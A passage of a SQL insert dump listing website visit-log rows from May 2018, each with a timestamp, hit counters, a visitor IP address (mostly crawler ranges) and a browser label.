1,1,0,0,'54.236.8.204','other'),(243507,1526018022,1,1,0,0,'54.36.148.33','other'),(243508,1526018826,1,1,0,0,'54.36.148.220','other'),(243509,1526018881,1,1,0,0,'193.106.30.99','firefox'),(243510,1526018886,1,1,0,0,'54.236.8.204','other'),(243511,1526019607,1,1,0,0,'54.36.148.64','other'),(243512,1526019767,1,1,0,0,'95.132.3.112','firefox'),(243513,1526019801,1,1,0,0,'54.236.8.204','other'),(243514,1526020020,1,1,0,0,'195.230.119.59','chrome'),(243515,1526020065,1,1,0,0,'54.36.148.215','other'),(243516,1526020381,2,2,0,0,'91.196.178.169','chrome'),(243517,1526020471,1,1,0,0,'178.154.171.88','other'),(243518,1526020666,1,1,0,0,'8.29.198.26','other'),(243519,1526020702,1,1,0,0,'54.236.8.204','other'),(243520,1526020732,1,1,0,0,'54.36.148.28','other'),(243521,1526020896,1,1,0,0,'54.36.148.136','other'),(243522,1526020960,1,1,0,0,'54.36.148.122','other'),(243523,1526021031,1,1,0,0,'54.36.148.95','other'),(243524,1526021106,1,1,0,0,'37.55.116.84','chrome'),(243525,1526021110,1,1,0,0,'54.36.148.207','other'),(243526,1526021166,1,1,0,0,'217.69.133.2','other'),(243527,1526021307,1,1,0,0,'54.36.148.216','other'),(243528,1526021311,1,1,0,0,'54.36.148.45','other'),(243529,1526021344,1,1,0,0,'178.93.19.124','chrome'),(243530,1526021379,1,1,0,0,'54.36.149.20','other'),(243531,1526021409,1,1,0,0,'54.36.148.203','other'),(243532,1526021436,1,1,0,0,'54.36.148.166','other'),(243533,1526021604,1,1,0,0,'54.236.8.204','other'),(243534,1526021846,1,1,0,0,'54.36.148.76','other'),(243535,1526021879,1,1,0,0,'54.36.148.135','other'),(243536,1526021983,1,1,0,0,'54.36.148.151','other'),(243537,1526022128,1,1,0,0,'54.36.148.150','other'),(243538,1526022303,1,1,0,0,'37.145.11.107','msie'),(243539,1526022367,1,0,1,0,'66.249.64.30',''),(243540,1526022487,2,2,0,0,'162.210.196.129','other'),(243541,1526022508,1,1,0,0,'54.236.8.204','other'),(243542,1526022521,1,1,0,0,'46.161.9.39','firefox'),(243543,1526022556,1,1,0,0,'217.69.133.219','other'),(243544,1526022651,1,1,0,0,'54.36.149.8','other'),(243545,1526022746,1,1,0,0,'54.36.148.247','other'),(243546,1526022924,1,1,0,0,'54.36.148.67','other'),(243547,1526022980,1,1,0,0,'54.36.148.54','other'),(243548,1526023191,1,1,0,0,'93.170.116.37','chrome'),(243549,1526023218,1,1,0,0,'54.36.148.125','other'),(243550,1526023333,1,1,0,0,'54.36.148.47','other'),(243551,1526023455,1,1,0,0,'54.236.8.204','other'),(243552,1526023613,1,1,0,0,'54.36.148.79','other'),(243553,1526023784,1,1,0,0,'54.36.148.27','other'),(243554,1526023864,1,1,0,0,'37.73.168.154','chrome'),(243555,1526023876,1,1,0,0,'176.122.122.210','chrome'),(243556,1526023958,1,1,0,0,'141.8.142.74','other'),(243557,1526024006,1,1,0,0,'54.36.149.76','other'),(243558,1526024008,1,1,0,0,'91.196.178.89','chrome'),(243559,1526024009,1,1,0,0,'80.252.155.198','firefox'),(243560,1526024130,1,1,0,0,'54.36.148.182','other'),(243561,1526024303,1,1,0,0,'95.132.20.56','chrome'),(243562,1526024338,1,1,0,0,'178.154.171.88','other'),(243563,1526024370,1,1,0,0,'54.236.8.204','other'),(243564,1526024401,1,1,0,0,'178.92.136.125','chrome'),(243565,1526024497,1,1,0,0,'54.36.148.245','other'),(243566,1526024648,1,1,0,0,'54.36.148.62','other'),(243567,1526024685,1,1,0,0,'54.36.149.33','other'),(243568,1526024688,1,1,0,0,'54.36.149.74','other'),(243569,1526024736,1,1,0,0,'54.36.148.68','other'),(243570,1526024755,1,1,0,0,'87.250.224.46','other'),(243571,1526024960,1,1,0,0,'91.196.178.132','firefox'),(243572,1526024999,2,2,0,0,'91.196.178.48','chrome'),(243573,1526025240,1,1,0,0,'37.9.113.182','other'),(243574,1526025289,1,1,0,0,'54.236.8.204','other'),(243575,1526025372,1,1,0,0,'178.92.223.108','chrome'),(243576,1526025417,1,1,0,0,'54.36.149.79','other'),(243577,1526025495,1,1,0,0,'54.36.149.28','other'),(243578,1526025866,2,2,0,0,'91.196.178.16','chrome'),(243579,1526026082,1,1,0,0,'8.29.198.27','other'),(243580,1526026183,1,1,0,0,'91.196.177.35','chrome'),(243581,1526026219,1,1,0,0,'54.236.8.204','other'),(243582,1526026518,1,1,0,0,'54.36.149.97','other'),(243583,1526026566,1,1,0,0,'91.196.178.102','chrome'),(243584,1526026604,1,1,0,0,'216.244.66.237','other'),(243585,1526026732,1,1,0,0,'54.36.148.69','other'),(243586,1526026874,1,1,0,0,'91.196.178.77','firefox'),(243587,1526027006,1,1,0,0,'37.73.226.242','chrome'),(243588,1526027135,1,1,0,0,'54.236.8.204','other'),(243589,1526027359,1,1,0,0,'77.111.244.11','chrome'),(243590,1526027366,1,0,1,0,'66.249.64.28',''),(243591,1526027434,1,1,0,0,'46.175.84.20','chrome'),(243592,1526027436,1,1,0,0,'82.207.49.58','chrome'),(243593,1526027650,1,1,0,0,'178.93.19.124','chrome'),(243594,1526027794,1,1,0,0,'178.154.171.88','other'),(243595,1526027958,1,1,0,0,'54.36.149.51','other'),(243596,1526028052,1,1,0,0,'54.36.148.37','other'),(243597,1526028061,1,1,0,0,'54.236.8.204','other'),(243598,1526028265,2,2,0,0,'195.10.210.70','chrome'),(243599,1526028480,2,2,0,0,'54.36.148.139','other'),(243600,1526028540,1,1,0,0,'40.77.167.60','other'),(243601,1526028990,1,1,0,0,'54.236.8.204','other'),(243602,1526029004,1,1,0,0,'54.36.149.9','other'),(243603,1526029066,1,1,0,0,'54.36.148.90','other'),(243604,1526029265,1,1,0,0,'54.36.148.220','other'),(243605,1526029321,1,1,0,0,'54.36.149.90','other'),(243606,1526029330,1,1,0,0,'80.252.155.198','firefox'),(243607,1526029393,1,1,0,0,'195.182.202.33','chrome'),(243608,1526029672,1,1,0,0,'54.36.149.78','other'),(243609,1526029700,1,1,0,0,'54.36.148.89','other'),(243610,1526029900,2,2,0,0,'91.196.177.46','chrome'),(243611,1526029917,1,1,0,0,'54.36.148.34','other'),(243612,1526029921,1,1,0,0,'54.236.8.204','other'),(243613,1526029964,1,1,0,0,'54.36.148.25','other'),(243614,1526030059,1,1,0,0,'54.36.148.198','other'),(243615,1526030060,1,1,0,0,'54.36.148.250','other'),(243616,1526030302,1,1,0,0,'178.154.171.88','other'),(243617,1526030472,1,1,0,0,'91.196.178.102','chrome'),(243618,1526030526,1,1,0,0,'46.175.84.20','chrome'),(243619,1526030680,1,1,0,0,'54.36.149.26','other'),(243620,1526030829,1,1,0,0,'54.36.148.179','other'),(243621,1526030846,1,1,0,0,'54.236.8.204','other'),(243622,1526030904,1,1,0,0,'54.36.148.120','other'),(243623,1526030952,1,1,0,0,'54.36.148.67','other'),(243624,1526030981,1,1,0,0,'54.36.148.49','other'),(243625,1526031501,1,1,0,0,'91.196.177.15','chrome'),(243626,1526031508,1,1,0,0,'8.29.198.26','other'),(243627,1526031776,1,1,0,0,'54.236.8.204','other'),(243628,1526031829,1,1,0,0,'120.79.186.194','other'),(243629,1526031848,1,1,0,0,'54.36.148.170','other'),(243630,1526032164,1,1,0,0,'54.36.148.193','other'),(243631,1526032306,1,1,0,0,'91.124.182.170','firefox'),(243632,1526032422,1,1,0,0,'207.46.13.11','other'),(243633,1526032512,1,1,0,0,'54.36.148.171','other'),(243634,1526032547,2,2,0,0,'91.196.177.15','chrome'),(243635,1526032594,1,1,0,0,'54.36.148.18','other'),(243636,1526032658,1,1,0,0,'54.36.149.99','other'),(243637,1526032668,1,1,0,0,'54.36.149.83','other'),(243638,1526032683,1,1,0,0,'54.236.8.204','other'),(243639,1526032800,1,1,0,0,'54.36.148.51','other'),(243640,1526032861,1,1,0,0,'54.36.148.61','other'),(243641,1526032876,1,1,0,0,'91.196.178.77','firefox'),(243642,1526032895,1,1,0,0,'37.73.131.219','chrome'),(243643,1526032981,1,1,0,0,'54.36.148.231','other'),(243644,1526033195,1,1,0,0,'54.36.149.74','other'),(243645,1526033293,2,2,0,0,'54.36.148.161','other'),(243646,1526033607,1,1,0,0,'54.236.8.204','other'),(243647,1526033709,1,1,0,0,'93.183.229.151','chrome'),(243648,1526033890,1,1,0,0,'54.36.148.165','other'),(243649,1526034091,2,2,0,0,'216.244.66.237','other'),(243650,1526034194,1,1,0,0,'54.36.148.250','other'),(243651,1526034303,1,1,0,0,'54.36.149.45','other'),(243652,1526034340,1,1,0,0,'93.76.221.51','chrome'),(243653,1526034452,1,1,0,0,'141.8.142.74','other'),(243654,1526034513,1,1,0,0,'54.236.8.204','other'),(243655,1526034607,1,1,0,0,'157.55.39.253','other'),(243656,1526034848,1,1,0,0,'54.36.149.17','other'),(243657,1526035070,1,0,1,0,'66.249.70.27',''),(243658,1526035286,1,1,0,0,'54.36.148.78','other'),(243659,1526035454,1,1,0,0,'54.236.8.204','other'),(243660,1526035732,2,2,0,0,'91.196.178.18','chrome'),(243661,1526035937,1,1,0,0,'54.36.148.240','other'),(243662,1526036124,1,1,0,0,'141.8.142.74','other'),(243663,1526036360,2,2,0,0,'54.236.8.204','other'),(243664,1526036456,1,1,0,0,'178.95.213.133','chrome'),(243665,1526036482,1,0,1,0,'66.249.64.28',''),(243666,1526036605,1,0,1,0,'66.249.64.29',''),(243667,1526036820,1,1,0,0,'54.36.148.43','other'),(243668,1526036910,1,1,0,0,'54.36.148.242','other'),(243669,1526036912,1,1,0,0,'54.36.148.158','other'),(243670,1526036915,1,1,0,0,'8.29.198.27','other'),(243671,1526037120,1,1,0,0,'54.36.149.17','other'),(243672,1526037156,3,3,0,0,'91.196.177.46','chrome'),(243673,1526037273,1,1,0,0,'54.236.8.204','other'),(243674,1526037476,1,1,0,0,'54.36.149.96','other'),(243675,1526037857,1,0,1,0,'66.249.64.29',''),(243676,1526038125,1,1,0,0,'54.36.148.151','other'),(243677,1526038141,1,1,0,0,'40.77.167.45','other'),(243678,1526038223,2,2,0,0,'95.158.19.251','chrome'),(243679,1526038278,2,2,0,0,'141.8.142.74','other'),(243680,1526038345,1,0,1,0,'66.249.64.28',''),(243681,1526038465,1,1,0,0,'54.36.148.222','other'),(243682,1526038950,1,1,0,0,'77.111.244.48','chrome'),(243683,1526039488,2,2,0,0,'141.8.142.74','other'),(243684,1526039629,1,1,0,0,'54.36.148.158','other'),(243685,1526039653,1,0,1,0,'66.249.64.30',''),(243686,1526039714,1,1,0,0,'178.154.171.88','other'),(243687,1526039875,1,1,0,0,'54.36.148.217','other'),(243688,1526040134,1,1,0,0,'54.36.149.4','other'),(243689,1526040294,1,1,0,0,'54.36.149.45','other'),(243690,1526040567,1,1,0,0,'54.36.148.151','other'),(243691,1526040583,1,1,0,0,'193.106.30.99','firefox'),(243692,1526040622,1,1,0,0,'54.36.149.60','other'),(243693,1526041086,1,1,0,0,'54.36.149.33','other'),(243694,1526041093,1,1,0,0,'217.69.133.6','other'),(243695,1526041184,1,1,0,0,'54.36.148.248','other'),(243696,1526041877,2,2,0,0,'91.196.177.46','chrome'),(243697,1526042028,1,1,0,0,'54.36.149.24','other'),(243698,1526042086,1,1,0,0,'54.36.148.246','other'),(243699,1526042152,1,1,0,0,'54.36.148.135','other'),(243700,1526042188,2,2,0,0,'216.244.66.237','other'),(243701,1526042352,1,1,0,0,'8.29.198.25','other'),(243702,1526042667,1,0,1,0,'66.249.64.28',''),(243703,1526042890,1,1,0,0,'95.132.44.206','chrome'),(243704,1526042938,1,1,0,0,'54.36.148.109','other'),(243705,1526043041,1,1,0,0,'54.36.148.242','other'),(243706,1526043117,1,1,0,0,'54.36.149.94','other'),(243707,1526043368,1,1,0,0,'54.36.149.16','other'),(243708,1526043503,1,1,0,0,'54.36.149.101','other'),(243709,1526043762,1,1,0,0,'54.36.149.15','other'),(243710,1526043896,1,1,0,0,'54.36.148.82','other'),(243711,1526044035,2,0,2,0,'66.249.64.28',''),(243712,1526044165,1,1,0,0,'54.36.148.219','other'),(243713,1526044232,1,1,0,0,'54.36.148.139','other'),(243714,1526044283,1,1,0,0,'54.36.148.132','other'),(243715,1526044629,1,1,0,0,'54.36.148.93','other'),(243716,1526045193,1,1,0,0,'54.36.149.101','other'),(243717,1526045241,1,1,0,0,'54.36.148.170','other'),(243718,1526045357,1,1,0,0,'54.36.148.222','other'),(243719,1526045555,1,1,0,0,'54.36.148.132','other'),(243720,1526045703,1,1,0,0,'54.36.149.86','other'),(243721,1526046451,1,1,0,0,'54.36.149.41','other'),(243722,1526046639,1,1,0,0,'54.36.149.99','other'),(243723,1526046778,1,1,0,0,'54.36.148.141','other'),(243724,1526046780,1,1,0,0,'141.8.142.74','other'),(243725,1526046788,1,1,0,0,'54.36.148.214','other'),(243726,1526046792,1,1,0,0,'54.36.149.47','other'),(243727,1526047013,1,1,0,0,'54.36.148.172','other'),(243728,1526047034,1,1,0,0,'217.69.133.2','other'),(243729,1526047763,1,1,0,0,'8.29.198.26','other'),(243730,1526047980,1,1,0,0,'54.36.148.48','other'),(243731,1526048040,1,1,0,0,'54.36.148.236','other'),(243732,1526048049,1,1,0,0,'217.69.133.2','other'),(243733,1526048111,1,1,0,0,'54.36.148.146','other'),(243734,1526048470,1,1,0,0,'54.36.148.106','other'),(243735,1526048478,1,1,0,0,'54.36.148.110','other'),(243736,1526048588,1,1,0,0,'54.36.148.251','other'),(243737,1526048797,1,1,0,0,'54.36.148.183','other'),(243738,1526048956,1,1,0,0,'54.36.148.150','other'),(243739,1526049027,1,1,0,0,'54.36.149.74','other'),(243740,1526049115,1,1,0,0,'188.230.43.254','other'),(243741,1526049211,1,1,0,0,'54.36.149.39','other'),(243742,1526049918,1,1,0,0,'216.244.66.237','other'),(243743,1526050036,1,0,1,0,'66.249.64.30',''),(243744,1526050190,1,0,1,0,'66.249.64.28',''),(243745,1526050193,1,1,0,0,'54.36.148.206','other'),(243746,1526050214,1,1,0,0,'54.36.148.201','other'),(243747,1526050219,1,1,0,0,'141.8.142.74','other'),(243748,1526050430,1,1,0,0,'54.36.148.232','other'),(243749,1526050547,1,1,0,0,'93.73.237.59','chrome'),(243750,1526050551,1,1,0,0,'54.36.148.171','other'),(243751,1526050839,1,1,0,0,'54.36.149.97','other'),(243752,1526051115,1,1,0,0,'54.36.148.130','other'),(243753,1526051378,1,1,0,0,'188.230.43.254','other'),(243754,1526051537,1,1,0,0,'54.36.148.81','other'),(243755,1526051690,1,1,0,0,'54.36.148.58','other'),(243756,1526051887,1,1,0,0,'54.36.149.61','other'),(243757,1526052005,1,0,1,0,'66.249.64.29',''),(243758,1526052314,1,1,0,0,'54.36.148.68','other'),(243759,1526052396,1,1,0,0,'54.36.148.85','other'),(243760,1526052597,1,1,0,0,'54.36.148.23','other'),(243761,1526052853,1,1,0,0,'178.154.171.88','other'),(243762,1526053199,1,1,0,0,'8.29.198.26','other'),(243763,1526053214,1,1,0,0,'180.76.15.16','other'),(243764,1526053516,1,1,0,0,'54.36.148.220','other'),(243765,1526053760,1,1,0,0,'188.230.43.254','other'),(243766,1526053887,1,1,0,0,'91.196.178.39','chrome'),(243767,1526054133,1,1,0,0,'54.36.148.57','other'),(243768,1526054183,1,1,0,0,'54.36.149.84','other'),(243769,1526054351,1,1,0,0,'54.36.149.88','other'),(243770,1526054575,1,1,0,0,'54.36.148.96','other'),(243771,1526054856,1,1,0,0,'54.36.149.96','other'),(243772,1526054870,1,1,0,0,'54.36.148.10','other'),(243773,1526054965,1,1,0,0,'54.36.148.78','other'),(243774,1526055012,1,1,0,0,'54.36.148.51','other'),(243775,1526055028,1,1,0,0,'54.36.149.55','other'),(243776,1526055039,3,0,3,0,'66.249.64.28',''),(243777,1526055061,1,1,0,0,'54.36.149.39','other'),(243778,1526055085,1,0,1,0,'66.249.64.29',''),(243779,1526055100,1,1,0,0,'54.36.148.81','other'),(243780,1526055203,1,1,0,0,'216.244.66.237','other'),(243781,1526055482,1,1,0,0,'220.181.132.197','chrome'),(243782,1526055600,1,1,0,0,'54.36.149.40','other'),(243783,1526055638,1,1,0,0,'54.36.148.158','other'),(243784,1526055698,1,1,0,0,'54.36.148.13','other'),(243785,1526055784,1,1,0,0,'54.36.149.77','other'),(243786,1526055858,1,1,0,0,'54.36.148.243','other'),(243787,1526055878,1,1,0,0,'54.36.149.62','other'),(243788,1526055884,22,22,0,0,'142.4.200.37','other'),(243789,1526056168,1,1,0,0,'188.230.43.254','other'),(243790,1526056338,1,1,0,0,'141.8.142.74','other'),(243791,1526056394,1,1,0,0,'54.36.148.152','other'),(243792,1526056489,1,1,0,0,'216.244.66.237','other'),(243793,1526056565,1,1,0,0,'54.36.148.77','other'),(243794,1526056609,1,1,0,0,'54.36.148.239','other'),(243795,1526056958,1,1,0,0,'54.36.148.19','other'),(243796,1526057024,1,1,0,0,'54.36.148.82','other'),(243797,1526057047,1,0,1,0,'66.249.64.30',''),(243798,1526057155,1,0,1,0,'66.249.64.29',''),(243799,1526057789,1,1,0,0,'54.36.148.39','other'),(243800,1526057971,1,1,0,0,'54.36.148.47','other'),(243801,1526057983,1,1,0,0,'54.36.148.179','other'),(243802,1526058104,1,1,0,0,'54.36.148.55','other'),(243803,1526058118,1,1,0,0,'54.36.148.194','other'),(243804,1526058126,1,1,0,0,'54.36.148.230','other'),(243805,1526058272,1,1,0,0,'54.36.148.192','other'),(243806,1526058361,1,1,0,0,'54.36.149.18','other'),(243807,1526058597,1,1,0,0,'8.29.198.27','other'),(243808,1526058902,1,0,1,0,'66.249.64.29',''),(243809,1526058965,1,0,1,0,'66.249.70.27',''),(243810,1526058969,2,1,1,0,'66.249.70.25',''),(243811,1526058981,1,1,0,0,'66.249.64.30','chrome'),(243812,1526059428,1,1,0,0,'54.36.148.57','other'),(243813,1526060024,1,1,0,0,'54.36.149.89','other'),(243814,1526060026,1,0,1,0,'66.249.64.28',''),(243815,1526060196,1,1,0,0,'54.36.148.208','other'),(243816,1526060199,1,1,0,0,'54.36.149.18','other'),(243817,1526060359,1,1,0,0,'54.36.148.170','other'),(243818,1526060662,1,1,0,0,'54.36.149.23','other'),(243819,1526060720,1,1,0,0,'54.36.148.137','other'),(243820,1526060768,1,1,0,0,'157.55.39.253','other'),(243821,1526060793,1,0,1,0,'66.249.64.30',''),(243822,1526060831,1,1,0,0,'54.165.59.7','other'),(243823,1526060923,1,1,0,0,'54.36.148.176','other'),(243824,1526060957,1,1,0,0,'54.36.148.19','other'),(243825,1526060998,1,1,0,0,'54.36.148.103','other'),(243826,1526061024,1,1,0,0,'54.36.149.19','other'),(243827,1526061055,1,1,0,0,'54.36.148.86','other'),(243828,1526061290,1,1,0,0,'141.8.142.74','other'),(243829,1526061343,1,1,0,0,'54.36.149.61','other'),(243830,1526061369,1,1,0,0,'54.36.148.241','other'),(243831,1526061413,1,1,0,0,'54.36.149.101','other'),(243832,1526061501,1,1,0,0,'54.36.148.167','other'),(243833,1526061746,1,1,0,0,'54.36.148.153','other'),(243834,1526061797,1,1,0,0,'178.154.171.88','other'),(243835,1526062000,1,1,0,0,'46.188.32.25','msie'),(243836,1526062041,1,0,1,0,'66.249.64.28',''),(243837,1526062178,1,1,0,0,'54.36.149.43','other'),(243838,1526062214,1,0,1,0,'66.249.64.30',''),(243839,1526062258,1,1,0,0,'54.36.148.234','other'),(243840,1526062392,1,1,0,0,'54.36.149.90','other'),(243841,1526062413,1,1,0,0,'54.36.148.57','other'),(243842,1526062579,1,1,0,0,'54.36.148.177','other'),(243843,1526062593,1,1,0,0,'54.36.149.38','other'),(243844,1526062658,1,1,0,0,'193.106.30.99','firefox'),(243845,1526062796,1,1,0,0,'54.36.149.0','other'),(243846,1526063071,1,1,0,0,'54.36.149.57','other'),(243847,1526063151,1,1,0,0,'94.179.14.122','other'),(243848,1526063646,1,0,1,0,'66.249.64.30',''),(243849,1526063734,1,1,0,0,'54.36.148.111','other'),(243850,1526063830,1,1,0,0,'207.46.13.11','other'),(243851,1526064046,1,1,0,0,'8.29.198.26','other'),(243852,1526064353,1,1,0,0,'54.36.149.73','other'),(243853,1526064388,1,1,0,0,'54.36.148.40','other'),(243854,1526064478,1,1,0,0,'66.249.70.25','chrome'),(243855,1526064481,1,1,0,0,'66.249.64.30','chrome'),(243856,1526064569,1,1,0,0,'54.36.148.223','other'),(243857,1526064612,1,1,0,0,'54.36.148.179','other'),(243858,1526064789,1,1,0,0,'54.36.149.60','other'),(243859,1526064845,1,1,0,0,'54.36.149.27','other'),(243860,1526064904,2,2,0,0,'91.196.178.167','chrome'),(243861,1526065103,2,0,2,0,'66.249.64.29',''),(243862,1526065361,1,0,1,0,'66.249.64.28',''),(243863,1526065567,1,1,0,0,'87.250.224.46','other'),(243864,1526065789,1,1,0,0,'54.36.149.10','other'),(243865,1526065829,1,1,0,0,'216.244.66.237','other'),(243866,1526065843,1,1,0,0,'54.36.148.206','other'),(243867,1526066060,2,0,2,0,'66.249.64.29',''),(243868,1526066064,1,1,0,0,'180.76.15.137','other'),(243869,1526066224,1,1,0,0,'54.36.148.181','other'),(243870,1526066248,1,0,1,0,'66.249.64.30',''),(243871,1526066271,1,1,0,0,'54.36.148.125','other'),(243872,1526066463,1,0,1,0,'66.249.70.27',''),(243873,1526066777,1,1,0,0,'54.36.148.14','other'),(243874,1526066893,1,1,0,0,'54.36.149.50','other'),(243875,1526067829,1,1,0,0,'54.36.148.118','other'),(243876,1526068152,1,1,0,0,'91.196.178.39','chrome'),(243877,1526068266,1,1,0,0,'54.36.148.179','other'),(243878,1526068554,1,1,0,0,'54.36.149.61','other'),(243879,1526068591,2,2,0,0,'178.92.84.197','chrome'),(243880,1526068877,1,1,0,0,'54.36.149.67','other'),(243881,1526068969,1,1,0,0,'141.8.142.74','other'),(243882,1526069337,1,1,0,0,'178.154.171.88','other'),(243883,1526069434,1,1,0,0,'8.29.198.26','other'),(243884,1526069547,1,1,0,0,'54.36.149.33','other'),(243885,1526069560,1,1,0,0,'54.36.148.79','other'),(243886,1526069720,1,1,0,0,'54.36.149.55','other'),(243887,1526069905,1,1,0,0,'54.36.148.104','other'),(243888,1526070032,1,1,0,0,'54.36.148.139','other'),(243889,1526070125,1,1,0,0,'141.8.142.74','other'),(243890,1526070351,1,1,0,0,'37.9.113.101','other'),(243891,1526070478,1,0,1,0,'66.249.64.28',''),(243892,1526070798,1,1,0,0,'54.36.149.42','other'),(243893,1526070905,1,1,0,0,'54.36.148.79','other'),(243894,1526070928,1,1,0,0,'66.249.70.25','chrome'),(243895,1526070931,1,1,0,0,'66.249.64.28','chrome'),(243896,1526071002,1,1,0,0,'54.36.148.74','other'),(243897,1526071785,1,1,0,0,'54.36.148.132','other'),(243898,1526071864,1,1,0,0,'54.36.149.4','other'),(243899,1526072049,1,1,0,0,'91.209.11.236','other'),(243900,1526072301,1,1,0,0,'54.36.148.118','other'),(243901,1526072329,1,1,0,0,'54.36.148.91','other'),(243902,1526072493,1,1,0,0,'54.36.149.99','other'),(243903,1526072667,1,1,0,0,'54.36.148.153','other'),(243904,1526072745,1,1,0,0,'54.36.148.206','other'),(243905,1526073209,1,1,0,0,'66.249.64.29','chrome'),(243906,1526073222,1,1,0,0,'54.36.148.43','other'),(243907,1526073346,1,1,0,0,'54.36.148.38','other'),(243908,1526073399,1,1,0,0,'54.36.148.246','other'),(243909,1526073616,1,1,0,0,'54.36.148.253','other'),(243910,1526073935,1,1,0,0,'157.55.39.60','other'),(243911,1526073960,1,1,0,0,'54.36.148.172','other'),(243912,1526074161,1,1,0,0,'54.36.148.137','other'),(243913,1526074312,1,1,0,0,'54.36.149.91','other'),(243914,1526074317,1,1,0,0,'54.36.148.53','other'),(243915,1526074420,1,1,0,0,'216.244.66.237','other'),(243916,1526074899,1,1,0,0,'8.29.198.26','other'),(243917,1526075098,1,1,0,0,'54.36.148.77','other'),(243918,1526075233,2,2,0,0,'141.8.142.74','other'),(243919,1526075618,1,1,0,0,'46.161.9.39','firefox'),(243920,1526075653,2,0,2,0,'66.249.64.30',''),(243921,1526075663,1,1,0,0,'54.36.148.199','other'),(243922,1526075882,1,1,0,0,'54.36.149.2','other'),(243923,1526076087,1,1,0,0,'54.36.148.203','other'),(243924,1526076117,1,1,0,0,'54.36.148.97','other'),(243925,1526076387,1,1,0,0,'66.249.70.25','chrome'),(243926,1526076390,1,1,0,0,'66.249.64.29','chrome'),(243927,1526076671,1,1,0,0,'54.36.149.93','other'),(243928,1526076960,1,1,0,0,'54.36.148.142','other'),(243929,1526077299,1,1,0,0,'54.36.148.91','other'),(243930,1526077507,1,1,0,0,'54.36.149.82','other'),(243931,1526077608,1,1,0,0,'54.36.149.33','other'),(243932,1526077955,1,1,0,0,'54.36.149.51','other'),(243933,1526078019,1,1,0,0,'54.36.148.225','other'),(243934,1526078122,1,0,1,0,'66.249.64.30',''),(243935,1526078371,1,1,0,0,'54.36.148.169','other'),(243936,1526078407,1,1,0,0,'54.36.148.106','other'),(243937,1526078529,1,1,0,0,'54.36.148.60','other'),(243938,1526078664,1,1,0,0,'54.36.148.116','other'),(243939,1526079131,1,1,0,0,'54.36.148.236','other'),(243940,1526079322,1,1,0,0,'54.36.149.20','other'),(243941,1526079447,2,2,0,0,'54.36.148.27','other'),(243942,1526079540,1,1,0,0,'213.180.203.8','other'),(243943,1526080042,1,1,0,0,'91.209.11.236','other'),(243944,1526080079,1,1,0,0,'54.36.148.245','other'),(243945,1526080167,1,1,0,0,'54.36.148.34','other'),(243946,1526080266,1,1,0,0,'8.29.198.27','other'),(243947,1526080412,2,2,0,0,'216.244.66.237','other'),(243948,1526080569,1,1,0,0,'40.77.167.60','other'),(243949,1526080674,1,0,1,0,'66.249.64.30',''),(243950,1526080945,1,1,0,0,'141.8.142.74','other'),(243951,1526081008,1,1,0,0,'54.36.148.184','other'),(243952,1526081372,2,2,0,0,'216.244.66.237','other'),(243953,1526081732,1,1,0,0,'54.36.149.26','other'),(243954,1526081841,1,1,0,0,'66.249.70.27','chrome'),(243955,1526081842,1,1,0,0,'66.249.64.29','chrome'),(243956,1526082171,1,1,0,0,'178.154.171.88','other'),(243957,1526082376,1,1,0,0,'54.36.149.10','other'),(243958,1526082542,1,1,0,0,'217.69.133.2','other'),(243959,1526082687,1,0,1,0,'66.249.64.30',''),(243960,1526082767,1,1,0,0,'54.36.149.94','other'),(243961,1526082923,1,1,0,0,'54.36.149.51','other'),(243962,1526083240,1,1,0,0,'178.154.171.88','other'),(243963,1526083250,1,1,0,0,'141.8.142.74','other'),(243964,1526083788,1,1,0,0,'54.36.149.47','other'),(243965,1526084166,1,1,0,0,'54.36.148.158','other'),(243966,1526084293,1,1,0,0,'54.36.148.45','other'),(243967,1526084317,1,1,0,0,'54.36.148.35','other'),(243968,1526084348,1,1,0,0,'54.36.148.120','other'),(243969,1526084399,1,1,0,0,'54.36.148.190','other'),(243970,1526084476,1,1,0,0,'54.36.148.24','other'),(243971,1526084659,1,1,0,0,'54.36.148.121','other'),(243972,1526084867,1,1,0,0,'54.36.149.78','other'),(243973,1526085133,1,1,0,0,'54.36.148.52','other'),(243974,1526085267,1,1,0,0,'54.36.148.70','other'),(243975,1526085316,1,1,0,0,'54.36.149.45','other'),(243976,1526085363,1,1,0,0,'54.36.148.148','other'),(243977,1526085441,2,0,2,0,'66.249.64.30',''),(243978,1526085478,1,1,0,0,'54.36.148.108','other'),(243979,1526085523,1,1,0,0,'54.36.149.12','other'),(243980,1526085751,1,1,0,0,'8.29.198.27','other'),(243981,1526085852,1,0,1,0,'66.249.64.28',''),(243982,1526085884,1,1,0,0,'54.36.148.94','other'),(243983,1526085912,1,1,0,0,'54.36.148.178','other'),(243984,1526086139,1,1,0,0,'54.36.148.42','other'),(243985,1526086456,1,1,0,0,'54.36.148.212','other'),(243986,1526086594,1,1,0,0,'180.76.15.134','other'),(243987,1526086595,1,1,0,0,'188.255.91.224','msie'),(243988,1526086782,1,1,0,0,'54.36.148.172','other'),(243989,1526086923,1,1,0,0,'54.36.148.181','other'),(243990,1526087150,1,1,0,0,'54.36.149.78','other'),(243991,1526087702,1,1,0,0,'141.8.142.74','other'),(243992,1526087711,1,1,0,0,'54.36.148.142','other'),(243993,1526087831,1,1,0,0,'54.36.149.44','other'),(243994,1526088062,1,1,0,0,'54.36.148.162','other'),(243995,1526088543,1,1,0,0,'54.36.148.198','other'),(243996,1526088664,1,0,1,0,'66.249.64.29',''),(243997,1526088777,1,0,1,0,'66.249.64.30',''),(243998,1526089193,1,1,0,0,'54.36.148.179','other'),(243999,1526089234,1,1,0,0,'217.69.133.2','other'),(244000,1526089391,1,1,0,0,'54.36.148.101','other'),(244001,1526089500,1,0,1,0,'66.249.64.28',''),(244002,1526089730,1,1,0,0,'54.36.148.20','other'),(244003,1526089742,1,1,0,0,'54.36.148.138','other'),(244004,1526089923,1,1,0,0,'66.249.70.25','chrome'),(244005,1526089924,1,1,0,0,'66.249.64.28','chrome'),(244006,1526090012,1,1,0,0,'54.36.148.55','other'),(244007,1526090182,1,1,0,0,'54.36.148.143','other'),(244008,1526090306,1,1,0,0,'54.36.148.67','other'),(244009,1526090320,1,1,0,0,'54.36.148.243','other'),(244010,1526090516,1,1,0,0,'54.36.148.191','other'),(244011,1526090601,1,1,0,0,'54.36.148.11','other'),(244012,1526090625,1,1,0,0,'54.36.149.88','other'),(244014,1526090914,1,0,1,0,'66.249.64.29',''),(244015,1526091098,1,1,0,0,'8.29.198.26','other'),(244016,1526091151,1,1,0,0,'54.36.149.69','other'),(244017,1526091200,1,1,0,0,'54.36.148.38','other'),(244018,1526091277,1,1,0,0,'54.36.148.61','other'),(244019,1526091310,1,1,0,0,'54.36.148.241','other'),(244020,1526091315,1,1,0,0,'54.36.148.247','other'),(244021,1526091